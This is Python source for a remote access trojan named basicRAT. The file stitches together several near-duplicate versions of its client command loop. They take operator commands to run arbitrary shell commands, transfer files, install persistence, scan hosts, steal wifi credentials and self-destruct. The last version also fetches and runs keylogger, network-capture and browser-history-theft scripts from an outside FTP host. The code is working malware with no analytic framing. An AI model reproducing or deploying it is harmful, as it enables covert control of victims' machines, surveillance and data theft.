def client_loop(conn, dhkey):
while True:
results = ''
# wait to receive data from server
data = crypto.decrypt(conn.recv(4096), dhkey)
# seperate data into command and action
cmd, _, action = data.partition(' ')
if cmd == 'kill':
conn.close()
return 1
elif cmd == 'selfdestruct':
conn.close()
toolkit.selfdestruct(PLAT)
elif cmd == 'goodbye':
conn.shutdown(socket.SHUT_RDWR)
conn.close()
break
elif cmd == 'rekey':
dhkey = crypto.diffiehellman(conn)
elif cmd == 'persistence':
results = persistence.run(PLAT)
elif cmd == 'scan':
results = scan.single_host(action)
elif cmd == 'survey':
results = survey.run(PLAT)
elif cmd == 'cat':
results = toolkit.cat(action, PLAT)
elif cmd == 'execute':
results = toolkit.execute(action)
elif cmd == 'stealwifi':
results = toolkit.stealwifi(PLAT)
elif cmd == 'ls':
results = toolkit.ls(action, PLAT)
elif cmd == 'pwd':
results = toolkit.pwd(PLAT)
elif cmd == 'unzip':
results = toolkit.unzip(action)
elif cmd == 'wget':
results = toolkit.wget(action)
results += '\n{} completed.'.format(cmd)
conn.send(crypto.encrypt(results, dhkey))
def client_loop(conn, dhkey):
while True:
results = ''
# wait to receive data from server
data = crypto.decrypt(conn.recv(4096), dhkey)
# error checking here! for faulty shit (both sides of recv)
data = json2dict(data)
cmd, action = data['command'], data['action']
if cmd == 'kill':
conn.close()
return 1
elif cmd == 'selfdestruct':
conn.close()
toolkit.selfdestruct(PLAT)
elif cmd == 'quit':
conn.shutdown(socket.SHUT_RDWR)
conn.close()
break
elif cmd == 'persistence':
results = persistence.run(PLAT)
elif cmd == 'scan':
results = scan.single_host(action)
elif cmd == 'survey':
results = survey.run(PLAT)
elif cmd == 'cat':
results = toolkit.cat(action)
elif cmd == 'execute':
results = toolkit.execute(action)
elif cmd == 'ls':
results = toolkit.ls(action)
elif cmd == 'pwd':
results = toolkit.pwd()
elif cmd == 'unzip':
results = toolkit.unzip(action)
elif cmd == 'wget':
results = toolkit.wget(action)
results = results.rstrip() + '\n{} completed.'.format(cmd)
data = client_to_server(results)
data = dict2json(data)
conn.send(crypto.encrypt(data, dhkey))
def main():
conn = socket.socket()
conn.connect((HOST, PORT))
client = common.Client(conn, HOST, 1)
while True:
results = ''
# wait to receive data from server
data = client.recvGCM()
# don't process empty data
if not data:
continue
# seperate prompt into command and action
cmd, _, action = data.partition(' ')
# kill client
if cmd == 'kill':
conn.close()
sys.exit(0)
# regenerate DH key
# elif cmd == 'rekey':
# client.dh_key = crypto.diffiehellman(client.conn)
# continue
# run a command
elif cmd == 'execute':
results = subprocess.Popen(action, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
results = results.stdout.read() + results.stderr.read()
elif cmd == 'download':
client.sendfile(action.rstrip())
continue
elif cmd == 'upload':
client.recvfile(action.rstrip())
continue
elif cmd == 'persistence':
results = persistence.run(plat)
if 'unsuccessful' not in results:
persistence_applied = True
elif cmd == 'wget':
results = toolkit.wget(action)
elif cmd == 'unzip':
results = toolkit.unzip(action)
elif cmd == 'survey':
results = survey.run(plat)
elif cmd == 'scan':
results = scan.single_host(action)
elif cmd == 'selfdestruct':
conn.close()
toolkit.selfdestruct(plat)
client.sendGCM(results)
def main():
s = socket.socket()
s.connect((HOST, PORT))
DHKEY = crypto.diffiehellman(s)
while True:
data = s.recv(1024)
data = crypto.AES_decrypt(data, DHKEY)
# seperate prompt into command and action
cmd, _, action = data.partition(' ')
# stop client
if cmd == 'quit':
s.close()
sys.exit(0)
# run command
elif cmd == 'run':
results = subprocess.Popen(action, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
results = results.stdout.read() + results.stderr.read()
s.sendall(crypto.AES_encrypt(results, DHKEY))
# send file
elif cmd == 'download':
for fname in action.split():
fname = fname.strip()
filesock.sendfile(s, fname, DHKEY)
# receive file
elif cmd == 'upload':
for fname in action.split():
fname = fname.strip()
filesock.recvfile(s, fname, DHKEY)
# regenerate DH key
elif cmd == 'rekey':
DHKEY = crypto.diffiehellman(s)
# apply persistence mechanism
elif cmd == 'persistence':
results = persistence.run(PLAT_TYPE)
s.send(crypto.AES_encrypt(results, DHKEY))
# download a file from the web
elif cmd == 'wget':
results = toolkit.wget(action)
s.send(crypto.AES_encrypt(results, DHKEY))
# unzip a file
elif cmd == 'unzip':
results = toolkit.unzip(action)
s.send(crypto.AES_encrypt(results, DHKEY))
# run system survey
elif cmd == 'survey':
results = survey.run(PLAT_TYPE)
s.send(crypto.AES_encrypt(results, DHKEY))
# run a scan
elif cmd == 'scan':
results = scan.single_host(action)
s.send(crypto.AES_encrypt(results, DHKEY))
def main():
# determine system platform
plat = sys.platform
if plat.startswith('win'):
plat = 'win'
elif plat.startswith('linux'):
plat = 'nix'
elif plat.startswith('darwin'):
plat = 'mac'
else:
plat = 'unk'
# connect to basicRAT server
conn = socket.socket()
conn.connect((HOST, PORT))
client = common.Client(conn, HOST, 1)
while True:
results = ''
# wait to receive data from server
data = client.recvGCM()
# don't process empty data
if not data:
continue
# seperate data into command and action
cmd, _, action = data.partition(' ')
if cmd == 'download':
client.sendfile(action.rstrip())
continue
elif cmd == 'execute':
results = subprocess.Popen(action,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
results = results.stdout.read() + results.stderr.read()
elif cmd == 'kill':
conn.close()
sys.exit(0)
elif cmd == 'persistence':
results = persistence.run(plat)
# elif cmd == 'rekey':
# client.dh_key = crypto.diffiehellman(client.conn)
# continue
elif cmd == 'scan':
results = scan.single_host(action)
elif cmd == 'selfdestruct':
conn.close()
toolkit.selfdestruct(plat)
elif cmd == 'survey':
results = survey.run(plat)
elif cmd == 'unzip':
results = toolkit.unzip(action)
elif cmd == 'upload':
client.recvfile(action.rstrip())
continue
elif cmd == 'wget':
results = toolkit.wget(action)
client.sendGCM(results)
def main():
s = socket.socket()
s.connect((HOST, PORT))
dh_key = crypto.diffiehellman(s)
GCM = crypto.AES_GCM(dh_key)
IV = 0
s.setblocking(0)
while True:
#data = s.recv(1024)
#data = crypto.AES_decrypt(data, dh_key)
data = crypto.recvGCM(s, GCM)
IV += 1
if not data:
continue
# seperate prompt into command and action
cmd, _, action = data.partition(' ')
# stop client
if cmd == 'kill':
s.close()
sys.exit(0)
# run command
elif cmd == 'execute':
results = subprocess.Popen(action,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
results = results.stdout.read() + results.stderr.read()
crypto.sendGCM(s, GCM, IV, results)
# send file
elif cmd == 'download':
for fname in action.split():
fname = fname.strip()
filesock.sendfile(s, GCM, fname)
# receive file
elif cmd == 'upload':
for fname in action.split():
fname = fname.strip()
filesock.recvfile(s, GCM, IV, fname)
# regenerate DH key
elif cmd == 'rekey':
dh_key = crypto.diffiehellman(s)
# apply persistence mechanism
elif cmd == 'persistence':
results = persistence.run(PLAT_TYPE)
crypto.sendGCM(s, GCM, IV, results)
#s.send(crypto.AES_encrypt(results, dh_key))
# download a file from the web
elif cmd == 'wget':
results = toolkit.wget(action)
crypto.sendGCM(s, GCM, IV, results)
#s.send(crypto.AES_encrypt(results, dh_key))
# unzip a file
elif cmd == 'unzip':
results = toolkit.unzip(action)
crypto.sendGCM(s, GCM, IV, results)
#s.send(crypto.AES_encrypt(results, dh_key))
# run system survey
elif cmd == 'survey':
results = survey.run(PLAT_TYPE)
crypto.sendGCM(s, GCM, IV, results)
#s.send(crypto.AES_encrypt(results, dh_key))
# run a scan
elif cmd == 'scan':
results = scan.single_host(action)
crypto.sendGCM(s, GCM, IV, results)
def main():
conn = socket.socket()
conn.connect((HOST, PORT))
client = common.Client(conn, HOST, 1)
while True:
results = ''
data = client.recvGCM()
if not data:
continue
# seperate prompt into command and action
cmd, _, action = data.partition(' ')
# stop client
if cmd == 'kill':
conn.close()
sys.exit(0)
# run a command
elif cmd == 'execute':
results = subprocess.Popen(action,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
results = results.stdout.read() + results.stderr.read()
# send file
elif cmd == 'download':
for fname in action.split():
fname = fname.strip()
client.sendfile(fname)
continue
# receive file
elif cmd == 'upload':
for fname in action.split():
fname = fname.strip()
client.recvfile(fname)
continue
# regenerate DH key
# elif cmd == 'rekey':
# client.dh_key = crypto.diffiehellman(client.conn)
elif cmd == 'persistence':
results = persistence.run(plat)
elif cmd == 'wget':
results = toolkit.wget(action)
elif cmd == 'unzip':
results = toolkit.unzip(action)
elif cmd == 'survey':
results = survey.run(plat)
elif cmd == 'scan':
results = scan.single_host(action)
client.sendGCM(results)
def main():
# determine system platform
plat = sys.platform
if plat.startswith('win'):
plat = 'win'
elif plat.startswith('linux'):
plat = 'nix'
elif plat.startswith('darwin'):
plat = 'mac'
else:
plat = 'unk'
# connect to basicRAT server
conn = socket.socket()
conn.connect((HOST, PORT))
client = common.Client(conn, HOST, 1)
while True:
results = ''
# wait to receive data from server
data = client.recvGCM()
# don't process empty data
if not data:
continue
# seperate data into command and action
cmd, _, action = data.partition(' ')
if cmd == 'download':
client.sendfile(action.rstrip())
continue
elif cmd == 'execute':
results = subprocess.Popen(action,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
results = results.stdout.read() + results.stderr.read()
elif cmd == 'keylogger':
if action == 'clean':
action = [
'wget -q ftp://siic:[email protected]/keylogger/clean_keylogger.sh',
'sh clean_keylogger.sh'
]
for i in range(len(action)):
results = subprocess.Popen(action[i],
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
results = results.stdout.read() + results.stderr.read()
elif action == 'start':
action = 'sh keylogger/start_keylogger.sh'
results = subprocess.Popen(action,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
results = results.stdout.read() + results.stderr.read()
os.system("sh keylogger/keyslooper.sh &")
elif action == 'stop':
os.system("kill $(ps aux|grep keyslooper|awk '{print $2}')")
elif action == 'status':
action = "if [ \"`ps aux|grep keyslooper |grep sh |grep -v /bin/sh`\" ]; then echo Started; else echo Stopped ;fi"
results = subprocess.Popen(action,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
results = results.stdout.read() + results.stderr.read()
elif action == 'install':
action = [
'wget -r -q --no-parent -nH ftp://siic:[email protected]/keylogger/*'
]
for i in range(len(action)):
results = subprocess.Popen(action[i],
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
results = results.stdout.read() + results.stderr.read()
else:
results = 'use keylogger install | start | stop | clean'
elif cmd == 'netcapture':
if action == 'start':
action = 'wget -r -q --no-parent -nH ftp://siic:[email protected]/netcapture/netcapture.sh'
results = subprocess.Popen(action,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
results = results.stdout.read() + results.stderr.read()
os.system("sh netcapture/netcapture.sh &")
elif action == 'stop':
action = [
'wget -r -q --no-parent -nH ftp://siic:[email protected]/netcapture/netcapture_stop.sh',
'. netcapture/netcapture_stop.sh'
]
for i in range(len(action)):
results = subprocess.Popen(action[i],
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
results = results.stdout.read() + results.stderr.read()
else:
results = 'use netcapture start | stop'
elif cmd == 'browser_history':
action = [
'wget -r -q --no-parent -nH ftp://siic:[email protected]/browser_history/browser_history.sh',
'sh browser_history/browser_history.sh'
]
for i in range(len(action)):
results = subprocess.Popen(action[i],
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
results = results.stdout.read() + results.stderr.read()
elif cmd == 'kill':
conn.close()
sys.exit(0)
elif cmd == 'persistence':
results = persistence.run(plat)
# elif cmd == 'rekey':
# client.dh_key = crypto.diffiehellman(client.conn)
# continue
elif cmd == 'scan':
results = scan.single_host(action)
elif cmd == 'selfdestruct':
conn.close()
toolkit.selfdestruct(plat)
elif cmd == 'survey':
results = survey.run(plat)
elif cmd == 'unzip':
results = toolkit.unzip(action)
elif cmd == 'upload':
client.recvfile(action.rstrip())
continue
elif cmd == 'wget':
results = toolkit.wget(action)
client.sendGCM(results)